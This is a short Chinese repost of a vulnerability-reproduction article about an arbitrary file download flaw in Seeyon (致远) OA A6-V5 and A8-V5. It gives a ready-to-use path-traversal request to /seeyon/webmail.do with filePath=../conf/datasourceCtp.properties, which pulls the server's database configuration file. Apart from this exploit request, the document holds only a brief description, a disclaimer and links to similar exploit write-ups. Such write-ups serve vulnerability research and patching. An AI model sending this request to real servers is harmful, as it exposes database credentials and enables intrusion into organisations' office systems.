致远OA 任意文件下载漏洞（webmail.do文件）

本文转载自查看原文 2021-01-21 18:18 2512 漏洞复现

介绍

致远OA是北京致远互联软件股份有限公司研发一款办公系统。

致远OA webmail.do文件读取漏洞，
由于 /seeyon/webmail.do 页面 filePath 参数过滤不严，导致可以读取系统敏感文件。

通过修改filePath参数来下载服务器文件
/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

A6-V5、A8-V5

访问

http://xx.xx.xxx.xx/seeyon/webmail.do?method=doDownloadAtt&filename=conf&filePath=../conf/datasourceCtp.properties

datasourceCtp.properties文件内容为：

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 致远OA任意文件上传漏洞复现致远OA htmlofficeservlet任意文件写入漏洞 seeyou 致远OA 任意文件上传任意文件下载(pikachu) 任意文件下载漏洞的接口URL构造分析与讨论任意文件下载包含https的图片 PHPCMS V9 任意文件下载(Windows) 通达OA 任意文件上传+文件包含导致RCE漏洞复现通达OA任意文件上传和文件包含漏洞导致RCE 任意文件上传漏洞